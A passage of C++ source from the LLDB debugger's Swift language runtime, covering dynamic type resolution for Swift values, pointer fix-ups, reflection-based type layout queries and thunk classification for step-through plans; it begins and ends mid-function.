instance_type_sp->GetValueAsUnsigned(0); if (metadata_location == 0 || metadata_location == LLDB_INVALID_ADDRESS) return false; SetupSwiftError(); if (m_SwiftNativeNSErrorISA.hasValue()) { if (auto objc_runtime = GetObjCRuntime()) { if (auto descriptor = objc_runtime->GetClassDescriptor(*instance_type_sp)) { if (descriptor->GetISA() != m_SwiftNativeNSErrorISA.getValue()) { // not a __SwiftNativeNSError - but statically typed as ErrorType // return true here return true; } } } } if (GetObjCRuntime()) { // this is a swift native error but it can be bridged to ObjC // so it needs to be layout compatible size_t ptr_size = m_process->GetAddressByteSize(); size_t metadata_offset = ptr_size + 4 + (ptr_size == 8 ? 4 : 0); // CFRuntimeBase metadata_offset += ptr_size + ptr_size + ptr_size; // CFIndex + 2*CFRef metadata_location += metadata_offset; Status error; lldb::addr_t metadata_ptr_value = m_process->ReadPointerFromMemory(metadata_location, error); if (metadata_ptr_value == 0 || metadata_ptr_value == LLDB_INVALID_ADDRESS || error.Fail()) return false; } else { // this is a swift native error and it has no way to be bridged to ObjC // so it adopts a more compact layout Status error; size_t ptr_size = m_process->GetAddressByteSize(); size_t metadata_offset = 2 * ptr_size; metadata_location += metadata_offset; lldb::addr_t metadata_ptr_value = m_process->ReadPointerFromMemory(metadata_location, error); if (metadata_ptr_value == 0 || metadata_ptr_value == LLDB_INVALID_ADDRESS || error.Fail()) return false; } return true; } bool SwiftLanguageRuntime::GetDynamicTypeAndAddress_Protocol( ValueObject &in_value, CompilerType protocol_type, SwiftASTContext &scratch_ctx, lldb::DynamicValueType use_dynamic, TypeAndOrName &class_type_or_name, Address &address) { Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); auto &target = m_process->GetTarget(); assert(IsScratchContextLocked(target) && "Swift scratch context not locked ahead"); auto &remote_ast = GetRemoteASTContext(scratch_ctx); lldb::addr_t existential_address; bool use_local_buffer = false; if (in_value.GetValueType() == eValueTypeConstResult && in_value.GetValue().GetValueType() == lldb_private::Value::eValueTypeHostAddress) { if (log) log->Printf("existential value is a const result"); // We have a locally materialized value that is a host address; // register it with MemoryReader so it does not treat it as a load // address. Note that this assumes that any address at that host // address is also a load address. If this assumption breaks there // will be a crash in readBytes(). existential_address = in_value.GetValue().GetScalar().ULongLong(); use_local_buffer = true; } else { existential_address = in_value.GetAddressOf(); } if (log) log->Printf("existential address is %llu", existential_address); if (!existential_address || existential_address == LLDB_INVALID_ADDRESS) return false; if (use_local_buffer) PushLocalBuffer(existential_address, in_value.GetByteSize()); swift::remote::RemoteAddress remote_existential(existential_address); auto result = remote_ast.getDynamicTypeAndAddressForExistential( remote_existential, GetSwiftType(protocol_type)); if (use_local_buffer) PopLocalBuffer(); if (!result.isSuccess()) { if (log) log->Printf("RemoteAST failed to get dynamic type of existential"); return false; } auto type_and_address = result.getValue(); class_type_or_name.SetCompilerType(type_and_address.InstanceType); address.SetRawAddress(type_and_address.PayloadAddress.getAddressData()); return true; } SwiftLanguageRuntime::MetadataPromiseSP SwiftLanguageRuntime::GetPromiseForTypeNameAndFrame(const char *type_name, StackFrame *frame) { if (!frame || !type_name || !type_name[0]) return nullptr; StreamString type_metadata_ptr_var_name; type_metadata_ptr_var_name.Printf("$%s", type_name); VariableList *var_list = frame->GetVariableList(false); if (!var_list) return nullptr; VariableSP var_sp(var_list->FindVariable( ConstString(type_metadata_ptr_var_name.GetData()))); if (!var_sp) return nullptr; ValueObjectSP metadata_ptr_var_sp( frame->GetValueObjectForFrameVariable(var_sp, lldb::eNoDynamicValues)); if (!metadata_ptr_var_sp || metadata_ptr_var_sp->UpdateValueIfNeeded() == false) return nullptr; lldb::addr_t metadata_location(metadata_ptr_var_sp->GetValueAsUnsigned(0)); if (metadata_location == 0 || metadata_location == LLDB_INVALID_ADDRESS) return nullptr; return GetMetadataPromise(metadata_location, *metadata_ptr_var_sp); } CompilerType SwiftLanguageRuntime::DoArchetypeBindingForType(StackFrame &stack_frame, CompilerType base_type) { auto sc = stack_frame.GetSymbolContext(lldb::eSymbolContextEverything); Status error; // A failing Clang import in a module context permanently damages // that module context. Binding archetypes can trigger an import of // another module, so switch to a scratch context where such an // operation is safe. auto &target = m_process->GetTarget(); assert(IsScratchContextLocked(target) && "Swift scratch context not locked ahead of archetype binding"); auto scratch_ctx = target.GetScratchSwiftASTContext(error, stack_frame); if (!scratch_ctx) return base_type; base_type = scratch_ctx->ImportType(base_type, error); if (base_type.GetTypeInfo() & lldb::eTypeIsSwift) { swift::Type target_swift_type(GetSwiftType(base_type)); if (target_swift_type->hasArchetype()) target_swift_type = target_swift_type->mapTypeOutOfContext().getPointer(); // FIXME: This is wrong, but it doesn't actually matter right now since // all conformances are always visible auto *module_decl = scratch_ctx->GetASTContext()->getStdlibModule(); // Replace opaque types with their underlying types when possible. swift::Mangle::ASTMangler mangler(true); while (target_swift_type->hasOpaqueArchetype()) { auto old_type = target_swift_type; target_swift_type = target_swift_type.subst( [&](swift::SubstitutableType *type) -> swift::Type { auto opaque_type = llvm::dyn_cast<swift::OpaqueTypeArchetypeType>(type); if (!opaque_type) return type; // Try to find the symbol for the opaque type descriptor in the // process. auto mangled_name = ConstString( mangler.mangleOpaqueTypeDescriptor(opaque_type->getDecl())); SymbolContextList found; target.GetImages().FindSymbolsWithNameAndType(mangled_name, eSymbolTypeData, found); if (found.GetSize() == 0) return type; swift::Type result_type; for (unsigned i = 0, e = found.GetSize(); i < e; ++i) { SymbolContext found_sc; if (!found.GetContextAtIndex(i, found_sc)) continue; // See if the symbol has an address. if (!found_sc.symbol) continue; auto addr = found_sc.symbol->GetAddress() .GetLoadAddress(&target); if (!addr || addr == LLDB_INVALID_ADDRESS) continue; // Ask RemoteAST to get the underlying type out of the descriptor. auto &remote_ast = GetRemoteASTContext(*scratch_ctx); auto underlying_type_result = remote_ast.getUnderlyingTypeForOpaqueType( swift::remote::RemoteAddress(addr), opaque_type->getSubstitutions(), opaque_type->getOrdinal()); if (!underlying_type_result) continue; // If we haven't yet gotten an underlying type, use this as our // possible result. if (!result_type) { result_type = underlying_type_result.getValue(); } // If we have two possibilities, they should match. else if (!result_type->isEqual(underlying_type_result.getValue())) { return type; } } if (!result_type) return type; return result_type; }, swift::LookUpConformanceInModule(module_decl), swift::SubstFlags::DesugarMemberTypes | swift::SubstFlags::SubstituteOpaqueArchetypes); // Stop if we've reached a fixpoint where we can't further resolve opaque // types. if (old_type->isEqual(target_swift_type)) break; } target_swift_type = target_swift_type.subst( [this, &stack_frame, &scratch_ctx](swift::SubstitutableType *type) -> swift::Type { StreamString type_name; if (!GetAbstractTypeName(type_name, type)) return type; CompilerType concrete_type = this->GetConcreteType( &stack_frame, ConstString(type_name.GetString())); Status import_error; CompilerType target_concrete_type = scratch_ctx->ImportType(concrete_type, import_error); if (target_concrete_type.IsValid()) return swift::Type(GetSwiftType(target_concrete_type)); return type; }, swift::LookUpConformanceInModule(module_decl), swift::SubstFlags::DesugarMemberTypes); assert(target_swift_type); return {target_swift_type.getPointer()}; } return base_type; } bool SwiftLanguageRuntime::GetAbstractTypeName(StreamString &name, swift::Type swift_type) { auto *generic_type_param = swift_type->getAs<swift::GenericTypeParamType>(); if (!generic_type_param) return false; name.Printf(u8"\u03C4_%d_%d", generic_type_param->getDepth(), generic_type_param->getIndex()); return true; } bool SwiftLanguageRuntime::GetDynamicTypeAndAddress_Value( ValueObject &in_value, CompilerType &bound_type, lldb::DynamicValueType use_dynamic, TypeAndOrName &class_type_or_name, Address &address) { class_type_or_name.SetCompilerType(bound_type); llvm::Optional<uint64_t> size = bound_type.GetByteSize( in_value.GetExecutionContextRef().GetFrameSP().get()); if (!size) return false; lldb::addr_t val_address = in_value.GetAddressOf(true, nullptr); if (*size && (!val_address || val_address == LLDB_INVALID_ADDRESS)) return false; address.SetLoadAddress(val_address, in_value.GetTargetSP().get()); return true; } bool SwiftLanguageRuntime::GetDynamicTypeAndAddress_IndirectEnumCase( ValueObject &in_value, lldb::DynamicValueType use_dynamic, TypeAndOrName &class_type_or_name, Address &address) { static ConstString g_offset("offset"); DataExtractor data; Status error; if (!(in_value.GetParent() && in_value.GetParent()->GetData(data, error) && error.Success())) return false; bool has_payload; bool is_indirect; CompilerType payload_type; if (!SwiftASTContext::GetSelectedEnumCase( in_value.GetParent()->GetCompilerType(), data, nullptr, &has_payload, &payload_type, &is_indirect)) return false; if (has_payload && is_indirect && payload_type) class_type_or_name.SetCompilerType(payload_type); lldb::addr_t box_addr = in_value.GetValueAsUnsigned(LLDB_INVALID_ADDRESS); if (box_addr == LLDB_INVALID_ADDRESS) return false; box_addr = MaskMaybeBridgedPointer(box_addr); lldb::addr_t box_location = m_process->ReadPointerFromMemory(box_addr, error); if (box_location == LLDB_INVALID_ADDRESS) return false; box_location = MaskMaybeBridgedPointer(box_location); ProcessStructReader reader(m_process, box_location, GetBoxMetadataType()); uint32_t offset = reader.GetField<uint32_t>(g_offset); lldb::addr_t box_value = box_addr + offset; // try to read one byte at the box value m_process->ReadUnsignedIntegerFromMemory(box_value, 1, 0, error); if (error.Fail()) // and if that fails, then we're off in no man's land return false; Flags type_info(payload_type.GetTypeInfo()); if (type_info.AllSet(eTypeIsSwift | eTypeIsClass)) { lldb::addr_t old_box_value = box_value; box_value = m_process->ReadPointerFromMemory(box_value, error); if (box_value == LLDB_INVALID_ADDRESS) return false; DataExtractor data(&box_value, m_process->GetAddressByteSize(), m_process->GetByteOrder(), m_process->GetAddressByteSize()); ValueObjectSP valobj_sp(ValueObject::CreateValueObjectFromData( "_", data, *m_process, payload_type)); if (!valobj_sp) return false; Value::ValueType value_type; if (!GetDynamicTypeAndAddress(*valobj_sp, use_dynamic, class_type_or_name, address, value_type)) return false; address.SetRawAddress(old_box_value); return true; } else if (type_info.AllSet(eTypeIsSwift | eTypeIsProtocol)) { SwiftASTContext::ProtocolInfo protocol_info; if (!SwiftASTContext::GetProtocolTypeInfo(payload_type, protocol_info)) return false; auto ptr_size = m_process->GetAddressByteSize(); std::vector<uint8_t> buffer(ptr_size * protocol_info.m_num_storage_words, 0); for (uint32_t idx = 0; idx < protocol_info.m_num_storage_words; idx++) { lldb::addr_t word = m_process->ReadUnsignedIntegerFromMemory( box_value + idx * ptr_size, ptr_size, 0, error); if (error.Fail()) return false; memcpy(&buffer[idx * ptr_size], &word, ptr_size); } DataExtractor data(&buffer[0], buffer.size(), m_process->GetByteOrder(), m_process->GetAddressByteSize()); ValueObjectSP valobj_sp(ValueObject::CreateValueObjectFromData( "_", data, *m_process, payload_type)); if (!valobj_sp) return false; Value::ValueType value_type; if (!GetDynamicTypeAndAddress(*valobj_sp, use_dynamic, class_type_or_name, address, value_type)) return false; address.SetRawAddress(box_value); return true; } else { // This is most likely a statically known type. address.SetLoadAddress(box_value, &m_process->GetTarget()); return true; } } // Dynamic type resolution tends to want to generate scalar data - but there are // caveats // Per original comment here // "Our address is the location of the dynamic type stored in memory. It isn't // a load address, // because we aren't pointing to the LOCATION that stores the pointer to us, // we're pointing to us..." // See inlined comments for exceptions to this general rule. Value::ValueType SwiftLanguageRuntime::GetValueType( Value::ValueType static_value_type, const CompilerType &static_type, const CompilerType &dynamic_type, bool is_indirect_enum_case) { Flags static_type_flags(static_type.GetTypeInfo()); Flags dynamic_type_flags(dynamic_type.GetTypeInfo()); if (dynamic_type_flags.AllSet(eTypeIsSwift)) { // for a protocol object where does the dynamic data live if the target // object is a struct? (for a class, it's easy) if (static_type_flags.AllSet(eTypeIsSwift | eTypeIsProtocol) && dynamic_type_flags.AnySet(eTypeIsStructUnion | eTypeIsEnumeration)) { SwiftASTContext *swift_ast_ctx = llvm::dyn_cast_or_null<SwiftASTContext>(static_type.GetTypeSystem()); if (swift_ast_ctx && swift_ast_ctx->IsErrorType(static_type)) { // ErrorType values are always a pointer return Value::eValueTypeLoadAddress; } switch (SwiftASTContext::GetAllocationStrategy(dynamic_type)) { case SwiftASTContext::TypeAllocationStrategy::eDynamic: case SwiftASTContext::TypeAllocationStrategy::eUnknown: break; case SwiftASTContext::TypeAllocationStrategy::eInline: // inline data; // same as the // static data return static_value_type; case SwiftASTContext::TypeAllocationStrategy::ePointer: // pointed-to; in // the target return Value::eValueTypeLoadAddress; } } if (static_type_flags.AllSet(eTypeIsSwift | eTypeIsGenericTypeParam)) { // if I am handling a non-pointer Swift type obtained from an archetype, // then the runtime vends the location // of the object, not the object per se (since the object is not a pointer // itself, this is way easier to achieve) // hence, it's a load address, not a scalar containing a pointer as for // ObjC classes if (dynamic_type_flags.AllClear(eTypeIsPointer | eTypeIsReference | eTypeInstanceIsPointer)) return Value::eValueTypeLoadAddress; } if (static_type_flags.AllSet(eTypeIsSwift | eTypeIsPointer) && static_type_flags.AllClear(eTypeIsGenericTypeParam)) { // FIXME: This branch is not covered by any testcases in the test suite. if (is_indirect_enum_case || static_type_flags.AllClear(eTypeIsBuiltIn)) return Value::eValueTypeLoadAddress; } } // Enabling this makes the inout_variables test hang. // return Value::eValueTypeScalar; if (static_type_flags.AllSet(eTypeIsSwift) && dynamic_type_flags.AllSet(eTypeIsSwift) && dynamic_type_flags.AllClear(eTypeIsPointer | eTypeInstanceIsPointer)) return static_value_type; else return Value::eValueTypeScalar; } static bool IsIndirectEnumCase(ValueObject &valobj) { return (valobj.GetLanguageFlags() & SwiftASTContext::LanguageFlags::eIsIndirectEnumCase) == SwiftASTContext::LanguageFlags::eIsIndirectEnumCase; } bool SwiftLanguageRuntime::GetDynamicTypeAndAddress( ValueObject &in_value, lldb::DynamicValueType use_dynamic, TypeAndOrName &class_type_or_name, Address &address, Value::ValueType &value_type) { class_type_or_name.Clear(); if (use_dynamic == lldb::eNoDynamicValues || !CouldHaveDynamicValue(in_value)) return false; // Dynamic type resolution in RemoteAST might pull in other Swift modules, so // use the scratch context where such operations are legal and safe. assert(IsScratchContextLocked(in_value.GetTargetSP()) && "Swift scratch context not locked ahead of dynamic type resolution"); auto scratch_ctx = in_value.GetScratchSwiftASTContext(); if (!scratch_ctx) return false; auto retry_once = [&]() { // Retry exactly once using the per-module fallback scratch context. auto &target = m_process->GetTarget(); if (!target.UseScratchTypesystemPerModule()) { Log *log(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); if (log) log->Printf("Dynamic type resolution detected fatal errors in " "shared Swift state. Falling back to per-module " "scratch context.\n"); target.SetUseScratchTypesystemPerModule(true); return GetDynamicTypeAndAddress(in_value, use_dynamic, class_type_or_name, address, value_type); } return false; }; if (scratch_ctx->HasFatalErrors()) return retry_once(); // Import the type into the scratch context. Any form of dynamic // type resolution may trigger a cross-module import. CompilerType val_type(in_value.GetCompilerType()); Flags type_info(val_type.GetTypeInfo()); if (!type_info.AnySet(eTypeIsSwift)) return false; bool success = false; bool is_indirect_enum_case = IsIndirectEnumCase(in_value); // Type kinds with metadata don't need archetype binding. if (is_indirect_enum_case) // ..._IndirectEnumCase() recurses, no need to bind archetypes. success = GetDynamicTypeAndAddress_IndirectEnumCase( in_value, use_dynamic, class_type_or_name, address); else if (type_info.AnySet(eTypeIsClass) || type_info.AllSet(eTypeIsBuiltIn | eTypeIsPointer | eTypeHasValue)) success = GetDynamicTypeAndAddress_Class( in_value, *scratch_ctx, use_dynamic, class_type_or_name, address); else if (type_info.AnySet(eTypeIsProtocol)) success = GetDynamicTypeAndAddress_Protocol( in_value, val_type, *scratch_ctx, use_dynamic, class_type_or_name, address); else { // Perform archetype binding in the scratch context. auto *frame = in_value.GetExecutionContextRef().GetFrameSP().get(); if (!frame) return false; CompilerType bound_type = DoArchetypeBindingForType(*frame, val_type); if (!bound_type) return false; Flags subst_type_info(bound_type.GetTypeInfo()); if (subst_type_info.AnySet(eTypeIsClass)) { success = GetDynamicTypeAndAddress_Class(in_value, *scratch_ctx, use_dynamic, class_type_or_name, address); } else if (subst_type_info.AnySet(eTypeIsProtocol)) { success = GetDynamicTypeAndAddress_Protocol(in_value, bound_type, *scratch_ctx, use_dynamic, class_type_or_name, address); } else { success = GetDynamicTypeAndAddress_Value(in_value, bound_type, use_dynamic, class_type_or_name, address); } } if (success) value_type = GetValueType( in_value.GetValue().GetValueType(), in_value.GetCompilerType(), class_type_or_name.GetCompilerType(), is_indirect_enum_case); else if (scratch_ctx->HasFatalErrors()) return retry_once(); return success; } TypeAndOrName SwiftLanguageRuntime::FixUpDynamicType(const TypeAndOrName &type_and_or_name, ValueObject &static_value) { TypeAndOrName ret(type_and_or_name); bool should_be_made_into_ref = false; bool should_be_made_into_ptr = false; Flags type_flags(static_value.GetCompilerType().GetTypeInfo()); Flags type_andor_name_flags(type_and_or_name.GetCompilerType().GetTypeInfo()); // if the static type is a pointer or reference, so should the dynamic type // caveat: if the static type is a Swift class instance, the dynamic type // could either be a Swift type (no need to change anything), or an ObjC type // in which case it needs to be made into a pointer if (type_flags.AnySet(eTypeIsPointer)) should_be_made_into_ptr = (type_flags.AllClear(eTypeIsGenericTypeParam | eTypeIsBuiltIn) && !IsIndirectEnumCase(static_value)); else if (type_flags.AnySet(eTypeInstanceIsPointer)) should_be_made_into_ptr = !type_andor_name_flags.AllSet(eTypeIsSwift); else if (type_flags.AnySet(eTypeIsReference)) should_be_made_into_ref = true; else if (type_flags.AllSet(eTypeIsSwift | eTypeIsProtocol)) should_be_made_into_ptr = type_and_or_name.GetCompilerType().IsRuntimeGeneratedType() && !type_and_or_name.GetCompilerType().IsPointerType(); if (type_and_or_name.HasType()) { // The type will always be the type of the dynamic object. If our parent's // type was a pointer, // then our type should be a pointer to the type of the dynamic object. If // a reference, then the original type // should be okay... CompilerType orig_type = type_and_or_name.GetCompilerType(); CompilerType corrected_type = orig_type; if (should_be_made_into_ptr) corrected_type = orig_type.GetPointerType(); else if (should_be_made_into_ref) corrected_type = orig_type.GetLValueReferenceType(); ret.SetCompilerType(corrected_type); } return ret; } bool SwiftLanguageRuntime::IsTaggedPointer(lldb::addr_t addr, CompilerType type) { swift::CanType swift_can_type = GetCanonicalSwiftType(type); switch (swift_can_type->getKind()) { case swift::TypeKind::UnownedStorage: { Target &target = m_process->GetTarget(); llvm::Triple triple = target.GetArchitecture().GetTriple(); // On Darwin the Swift runtime stores unowned references to // Objective-C objects as a pointer to a struct that has the // actual object pointer at offset zero. The least significant bit // of the reference pointer indicates whether the reference refers // to an Objective-C or Swift object. // // This is a property of the Swift runtime(!). In the future it // may be necessary to check for the version of the Swift runtime // (or indirectly by looking at the version of the remote // operating system) to determine how to interpret references. if (triple.isOSDarwin()) // Check whether this is a reference to an Objective-C object. if ((addr & 1) == 1) return true; } default: break; } return false; } std::pair<lldb::addr_t, bool> SwiftLanguageRuntime::FixupPointerValue(lldb::addr_t addr, CompilerType type) { // Check for an unowned Darwin Objective-C reference. if (IsTaggedPointer(addr, type)) { // Clear the discriminator bit to get at the pointer to Objective-C object. bool needs_deref = true; return {addr & ~1ULL, needs_deref}; } // Adjust the pointer to strip away the spare bits. Target &target = m_process->GetTarget(); llvm::Triple triple = target.GetArchitecture().GetTriple(); switch (triple.getArch()) { case llvm::Triple::ArchType::aarch64: return {addr & ~SWIFT_ABI_ARM64_SWIFT_SPARE_BITS_MASK, false}; case llvm::Triple::ArchType::arm: return {addr & ~SWIFT_ABI_ARM_SWIFT_SPARE_BITS_MASK, false}; case llvm::Triple::ArchType::x86: return {addr & ~SWIFT_ABI_I386_SWIFT_SPARE_BITS_MASK, false}; case llvm::Triple::ArchType::x86_64: return {addr & ~SWIFT_ABI_X86_64_SWIFT_SPARE_BITS_MASK, false}; case llvm::Triple::ArchType::systemz: return {addr & ~SWIFT_ABI_S390X_SWIFT_SPARE_BITS_MASK, false}; case llvm::Triple::ArchType::ppc64le: return { addr & ~SWIFT_ABI_POWERPC64_SWIFT_SPARE_BITS_MASK, false}; default: break; } return {addr, false}; } /// This allows a language runtime to adjust references depending on the type. lldb::addr_t SwiftLanguageRuntime::FixupAddress(lldb::addr_t addr, CompilerType type, Status &error) { swift::CanType swift_can_type = GetCanonicalSwiftType(type); switch (swift_can_type->getKind()) { case swift::TypeKind::UnownedStorage: { // Peek into the reference to see whether it needs an extra deref. // If yes, return the fixed-up address we just read. Target &target = m_process->GetTarget(); size_t ptr_size = m_process->GetAddressByteSize(); lldb::addr_t refd_addr = LLDB_INVALID_ADDRESS; target.ReadMemory(addr, false, &refd_addr, ptr_size, error); if (error.Success()) { bool extra_deref; std::tie(refd_addr, extra_deref) = FixupPointerValue(refd_addr, type); if (extra_deref) return refd_addr; } } default: break; } return addr; } const swift::reflection::TypeInfo * SwiftLanguageRuntime::GetTypeInfo(CompilerType type) { swift::CanType swift_can_type(GetCanonicalSwiftType(type)); CompilerType can_type(swift_can_type); ConstString mangled_name(can_type.GetMangledTypeName()); StringRef mangled_no_prefix = swift::Demangle::dropSwiftManglingPrefix(mangled_name.GetStringRef()); swift::Demangle::Demangler Dem; auto demangled = Dem.demangleType(mangled_no_prefix); auto *type_ref = swift::Demangle::decodeMangledType( reflection_ctx->getBuilder(), demangled); if (!type_ref) return nullptr; return reflection_ctx->getBuilder().getTypeConverter().getTypeInfo(type_ref); } bool SwiftLanguageRuntime::IsStoredInlineInBuffer(CompilerType type) { if (auto *type_info = GetTypeInfo(type)) return type_info->isBitwiseTakable() && type_info->getSize() <= 24; return true; } llvm::Optional<uint64_t> SwiftLanguageRuntime::GetBitSize(CompilerType type) { if (auto *type_info = GetTypeInfo(type)) return type_info->getSize() * 8; return {}; } llvm::Optional<uint64_t> SwiftLanguageRuntime::GetByteStride(CompilerType type) { if (auto *type_info = GetTypeInfo(type)) return type_info->getStride(); return {}; } llvm::Optional<size_t> SwiftLanguageRuntime::GetBitAlignment(CompilerType type) { if (auto *type_info = GetTypeInfo(type)) return type_info->getAlignment(); return {}; } bool SwiftLanguageRuntime::IsWhitelistedRuntimeValue(ConstString name) { return name == g_self; } bool SwiftLanguageRuntime::CouldHaveDynamicValue(ValueObject &in_value) { // if (in_value.IsDynamic()) // return false; if (IsIndirectEnumCase(in_value)) return true; CompilerType var_type(in_value.GetCompilerType()); Flags var_type_flags(var_type.GetTypeInfo()); if (var_type_flags.AllSet(eTypeIsSwift | eTypeInstanceIsPointer)) { // Swift class instances are actually pointers, but base class instances // are inlined at offset 0 in the class data. If we just let base classes // be dynamic, it would cause an infinite recursion. So we would usually // disable it // But if the base class is a generic type we still need to bind it, and // that is // a good job for dynamic types to perform if (in_value.IsBaseClass()) { CompilerType base_type(in_value.GetCompilerType()); if (SwiftASTContext::IsFullyRealized(base_type)) return false; } return true; } return var_type.IsPossibleDynamicType(nullptr, false, false, true); } CompilerType SwiftLanguageRuntime::GetConcreteType(ExecutionContextScope *exe_scope, ConstString abstract_type_name) { if (!exe_scope) return CompilerType(); StackFrame *frame(exe_scope->CalculateStackFrame().get()); if (!frame) return CompilerType(); MetadataPromiseSP promise_sp( GetPromiseForTypeNameAndFrame(abstract_type_name.GetCString(), frame)); if (!promise_sp) return CompilerType(); return promise_sp->FulfillTypePromise(); } namespace { enum class ThunkKind { Unknown = 0, AllocatingInit, PartialApply, ObjCAttribute, Reabstraction, ProtocolConformance, }; enum class ThunkAction { Unknown = 0, GetThunkTarget, StepIntoConformance, StepThrough }; } static ThunkKind GetThunkKind(llvm::StringRef symbol_name) { swift::Demangle::Node::Kind kind; swift::Demangle::Context demangle_ctx; if (!demangle_ctx.isThunkSymbol(symbol_name)) return ThunkKind::Unknown; swift::Demangle::NodePointer nodes = demangle_ctx.demangleSymbolAsNode(symbol_name); size_t num_global_children = nodes->getNumChildren(); if (num_global_children == 0) return ThunkKind::Unknown; if (nodes->getKind() != swift::Demangle::Node::Kind::Global) return ThunkKind::Unknown; if (nodes->getNumChildren() == 0) return ThunkKind::Unknown; swift::Demangle::NodePointer node_ptr = nodes->getFirstChild(); kind = node_ptr->getKind(); switch (kind) { case swift::Demangle::Node::Kind::ObjCAttribute: return ThunkKind::ObjCAttribute; break; case swift::Demangle::Node::Kind::ProtocolWitness: if (node_ptr->getNumChildren() == 0) return ThunkKind::Unknown; if (node_ptr->getFirstChild()->getKind() == swift::Demangle::Node::Kind::ProtocolConformance) return ThunkKind::ProtocolConformance; break; case swift::Demangle::Node::Kind::ReabstractionThunkHelper: return ThunkKind::Reabstraction; case swift::Demangle::Node::Kind::PartialApplyForwarder: return ThunkKind::PartialApply; case swift::Demangle::Node::Kind::Allocator: if (node_ptr->getNumChildren() == 0) return ThunkKind::Unknown; if (node_ptr->getFirstChild()->getKind() == swift::Demangle::Node::Kind::Class) return ThunkKind::AllocatingInit; break; default: break; } return ThunkKind::Unknown; } static const char *GetThunkKindName (ThunkKind kind) { switch (kind) { case ThunkKind::Unknown: return "Unknown"; case ThunkKind::AllocatingInit: return "StepThrough"; case ThunkKind::PartialApply: return "GetThunkTarget"; case ThunkKind::ObjCAttribute: return "GetThunkTarget"; case ThunkKind::Reabstraction: return "GetThunkTarget"; case ThunkKind::ProtocolConformance: return "StepIntoConformance"; } } static ThunkAction GetThunkAction (ThunkKind kind) { switch (kind) { case ThunkKind::Unknown: return ThunkAction::Unknown; case ThunkKind::AllocatingInit: return ThunkAction::StepThrough; case ThunkKind::PartialApply: return ThunkAction::GetThunkTarget; case ThunkKind::ObjCAttribute: return ThunkAction::GetThunkTarget; case ThunkKind::Reabstraction: return ThunkAction::StepThrough; case ThunkKind::ProtocolConformance: return ThunkAction::StepIntoConformance; } } bool SwiftLanguageRuntime::GetTargetOfPartialApply(SymbolContext &curr_sc, ConstString &apply_name, SymbolContext &sc) { if (!curr_sc.module_sp) return false; SymbolContextList sc_list; swift::Demangle::Context demangle_ctx; // Make sure this is a partial apply: std::string apply_target = demangle_ctx.getThunkTarget(apply_name.GetStringRef()); if (!apply_target.empty()) { size_t num_symbols = curr_sc.module_sp->FindFunctions( ConstString(apply_target), NULL, eFunctionNameTypeFull, true, false, false, sc_list); if (num_symbols == 0) return false; CompileUnit *curr_cu = curr_sc.comp_unit; size_t num_found = 0; for (size_t i = 0; i < num_symbols; i++) { SymbolContext tmp_sc; if (sc_list.GetContextAtIndex(i, tmp_sc)) { if (tmp_sc.comp_unit && curr_cu && tmp_sc.comp_unit == curr_cu) { sc = tmp_sc; num_found++; } else if (curr_sc.module_sp == tmp_sc.module_sp) { sc = tmp_sc; num_found++; } } } if (num_found == 1) return true; else { sc.Clear(false); return false; } } else { return false; } } bool SwiftLanguageRuntime::IsSymbolARuntimeThunk(const Symbol &symbol) { llvm::StringRef symbol_name = symbol.GetMangled().GetMangledName().GetStringRef(); if (symbol_name.empty()) return false; swift::Demangle::Context demangle_ctx; return demangle_ctx.isThunkSymbol(symbol_name); } lldb::ThreadPlanSP SwiftLanguageRuntime::GetStepThroughTrampolinePlan(Thread &thread, bool stop_others) { // Here are the trampolines we have at present. // 1) The thunks from protocol invocations to the call in the actual object // implementing the protocol. // 2) Thunks for going from Swift ObjC classes to their actual method // invocations // 3) Thunks that retain captured objects in closure invocations. ThreadPlanSP new_thread_plan_sp; Log *log(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_STEP)); StackFrameSP stack_sp = thread.GetStackFrameAtIndex(0); if (!stack_sp) return new_thread_plan_sp; SymbolContext sc = stack_sp->GetSymbolContext(eSymbolContextEverything); Symbol *symbol = sc.symbol; // Note, I don't really need to consult IsSymbolARuntimeThunk here, but it // is fast to do and // keeps this list and the one in IsSymbolARuntimeThunk in sync. if (!symbol || !IsSymbolARuntimeThunk(*symbol)) return new_thread_plan_sp; // Only do this if you are at the beginning of the thunk function: lldb::addr_t cur_addr = thread.GetRegisterContext()->GetPC(); lldb::addr_t symbol_addr = symbol->GetAddress().GetLoadAddress( &thread.GetProcess()->GetTarget()); if (symbol_addr != cur_addr) return new_thread_plan_sp; Address target_address; ConstString symbol_mangled_name = symbol->GetMangled().GetMangledName(); const char *symbol_name = symbol_mangled_name.AsCString(); ThunkKind thunk_kind = GetThunkKind(symbol_mangled_name.GetStringRef()); ThunkAction thunk_action = GetThunkAction(thunk_kind); switch (thunk_action) { case ThunkAction::Unknown: return new_thread_plan_sp; case ThunkAction::GetThunkTarget: { swift::Demangle::Context demangle_ctx; std::string thunk_target = demangle_ctx.getThunkTarget(symbol_name); if (thunk_target.empty()) { if (log) log->Printf("Stepped to thunk \"%s\" (kind: %s) but could not " "find the thunk target. ", symbol_name, GetThunkKindName(thunk_kind)); return new_thread_plan_sp; } if (log) log->Printf("Stepped to thunk \"%s\" (kind: %s) stepping to target: \"%s\".", symbol_name, GetThunkKindName(thunk_kind), thunk_target.c_str()); ModuleList modules = thread.GetProcess()->GetTarget().GetImages(); SymbolContextList sc_list; modules.FindFunctionSymbols(ConstString(thunk_target), eFunctionNameTypeFull, sc_list); if (sc_list.GetSize() == 1) { SymbolContext sc; sc_list.GetContextAtIndex(0, sc); if (sc.symbol) target_address = sc.symbol->GetAddress(); } } break; case ThunkAction::StepIntoConformance: { // The TTW symbols encode the protocol conformance requirements and it // is possible to go to // the AST and get it to replay the logic that it used to determine // what to dispatch to. // But that ties us too closely to the logic of the compiler, and // these thunks are quite // simple, they just do a little retaining, and then call the correct // function. // So for simplicity's sake, I'm just going to get the base name of // the function // this protocol thunk is preparing to call, then step into through // the thunk, stopping if I end up // in a frame with that function name. swift::Demangle::Context demangle_ctx; swift::Demangle::NodePointer demangled_nodes = demangle_ctx.demangleSymbolAsNode(symbol_mangled_name.GetStringRef()); // Now find the ProtocolWitness node in the demangled result. swift::Demangle::NodePointer witness_node = demangled_nodes; bool found_witness_node = false; while (witness_node) { if (witness_node->getKind() == swift::Demangle::Node::Kind::ProtocolWitness) { found_witness_node = true; break; } witness_node = witness_node->getFirstChild(); } if (!found_witness_node) { if (log) log->Printf("Stepped into witness thunk \"%s\" but could not " "find the ProtocolWitness node in the demangled " "nodes.", symbol_name); 